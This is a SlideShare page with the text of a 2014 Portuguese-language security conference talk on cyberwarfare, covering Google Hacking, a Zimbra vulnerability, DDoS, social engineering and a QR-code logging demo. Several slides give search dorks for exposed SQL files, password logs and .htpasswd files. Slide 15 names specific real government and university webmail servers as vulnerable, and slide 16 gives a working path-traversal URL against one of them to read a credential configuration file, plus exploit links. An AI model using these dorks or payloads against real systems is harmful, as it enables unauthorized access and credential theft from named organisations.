Guerra cibernética 2.0 - Latinoware

618 visualizações

Publicada em

Apresentação feita na latinoware de 2014.

Publicada em: Dados e análise
0 comentários
1 gostou
Estatísticas
Notas
  • Seja o primeiro a comentar

Sem downloads
Visualizações
Visualizações totais
618
No SlideShare
0
A partir de incorporações
0
Número de incorporações
4
Ações
Compartilhamentos
0
Downloads
17
Comentários
0
Gostaram
1
Incorporações 0
Nenhuma incorporação

Nenhuma nota no slide

Guerra cibernética 2.0 - Latinoware

  1. 1. Guerra Cibernética 2.0
  2. 2. Dr. Edson Borelli CEO da Blackdoor Security, Senior Security Specialist da Futura Networks (Campus Party) Analista de Segurança Sênior, Gestor em Segurança da Informação, Empreendedor, Especialista em Segurança da Informação a mais de 15 anos. Doutor em Segurança da Informação Carnegie Mellon; Mestre em redes computacionais em University of Michigan; Graduação em Sistemas da Informação Universidade Presbiteriana Mackenzie Criou e fundou o LABSS (Laboratório de Segurança e Sustentabilidade – MACKENZIE). Palestrante atuante em diversas instituições no país, e também é professor em inúmeras universidades e faculdades do Brasil, com os temas Ethical Hacker, Cyber Ativismo, Engenharia Social, Cyber Terrorismo, Pedofilia. Especialista em Guerra Cibernética, Inteligência Cibernética, Hardenning, Mitigação, Firewall, Stress Testing, analise de Vulnerabilidades.
  3. 3. Estrutura
  4. 4. Hackers
  5. 5. Hackers ➔ Mundiais ➔ Brasileiros
  6. 6. Ransonware! Ranson…. o que?
  7. 7. Google Hacking
  8. 8. Google Hacking Google Hacking é a atividade de usar recursos de busca do site, visando atacar ou proteger melhor as informações de uma empresa. As informações disponíveis nos servidores web da empresa provavelmente estarão nas bases de dados do Google. Um servidor mal configurado pode expor diversas informações da empresa no Google. Não é difícil conseguir acesso a arquivos de base de dados de sites através do Google. site:gov.br ext:SQL
  9. 9. Google Hacking http://www.governoeletronico.gov.br/scripts_sql_novos_relatorio s/atualizacao_roles.sql
  10. 10. Google Hacking Serviços: intitle:”VNC Desktop ” inurl:5800 Informações: filetype:log inurl:”password.log” Listagem de diretórios: intitle:”index of” .htpasswd
  11. 11. Google Hacking site:gov intext:”TOP SECRET//” intext:SI|ORCON|NOFORN filetype:pdf
  12. 12. Google Hacking www.nasa.gov/index.html.old
  13. 13. Zimbra 0Day
  14. 14. Zimbra 0day O Zimbra oferece um software de servidor e cliente de código aberto para troca de mensagens e colaboração. Falha de 2013 continua até hoje em vários servidores zimbra, com uma pequena pesquisa no google (Google Hacking) podemos achar vários webmail’s zimbra e até então vulneráveis.
  15. 15. Zimbra 0day inurl: webmail & intext:zimbra https://webmail.salvador.ba.gov.br/ https://webmail.unifei.edu.br/ https://webmail.seduc.ce.gov.br/zimbra/ http://webmail.une.com.co/zimbra/
  16. 16. Zimbra 0day http://www.exploit-db.com/exploits/30085/ https://webmail.salvador.ba.gov.br/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxK eys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../ ../../../../../../../../opt/zimbra/conf/localconfig.xml%00
  17. 17. Zimbra 0day
  18. 18. Zimbra 0day Exploit: ➔ http://www.exploit-db.com/exploits/30085/ ➔ http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip Explicação e PoC: ➔ http://securityattack.com.br/emails-do-governo-igrejas-e-empresas-vulneraveis- em-ano-de-eleicao/
  19. 19. DDoS
  20. 20. DDoS http://securityattack.com.br/.attack
  21. 21. “O motivo para tudo isso? O membro que se autointitula Chronos explicou ao R7, em entrevista exclusiva. — A gente decidiu derrubar todos os TRE e conseguiu. Nós fazemos isso como protesto a essa roubalheira que nós vivemos.”
  22. 22. Engenharia Social
  23. 23. Engenharia Social A arte de enganar
  24. 24. Dr. Edson Borelli CEO da Blackdoor Security, Senior Security Specialist da Futura Networks (Campus Party) Analista de Segurança Sênior, Gestor em Segurança da Informação, Empreendedor, Especialista em Segurança da Informação a mais de 15 anos. Doutor em Segurança da Informação Carnegie Mellon; Mestre em redes computacionais em University of Michigan; Graduação em Sistemas da Informação Universidade Presbiteriana Mackenzie Criou e fundou o LABSS (Laboratório de Segurança e Sustentabilidade – MACKENZIE). Palestrante atuante em diversas instituições no país, e também é professor em inúmeras universidades e faculdades do Brasil, com os temas Ethical Hacker, Cyber Ativismo, Engenharia Social, Cyber Terrorismo, Pedofilia. Especialista em Guerra Cibernética, Inteligência Cibernética, Hardenning, Mitigação, Firewall, Stress Testing, analise de Vulnerabilidades.
  25. 25. Dr. Edson Borelli CEO da Blackdoor Security, Senior Security Specialist da Futura Networks (Campus Party) Analista de Segurança Sênior, Gestor em Segurança da Informação, Empreendedor, Especialista em Segurança da Informação a mais de 15 anos. Doutor em Segurança da Informação Carnegie Mellon; Mestre em redes computacionais em University of Michigan; Graduação em Sistemas da Informação Universidade Presbiteriana Mackenzie Criou e fundou o LABSS (Laboratório de Segurança e Sustentabilidade – MACKENZIE). Palestrante atuante em diversas instituições no país, e também é professor em inúmeras universidades e faculdades do Brasil, com os temas Ethical Hacker, Cyber Ativismo, Engenharia Social, Cyber Terrorismo, Pedofilia. Especialista em Guerra Cibernética, Inteligência Cibernética, Hardenning, Mitigação, Firewall, Stress Testing, analise de Vulnerabilidades.
  26. 26. QR Code
  27. 27. QR Code Link ➔ http://goo.gl/Iwrj5G Ver ➔ http://www.bds3c.com/evento/log.php Apagar ➔ http://www.bds3c.com/evento/log.php?cmd=clear
  28. 28. Engenharia Social Marketing Direito Psicologia
  29. 29. Obrigado!!!

×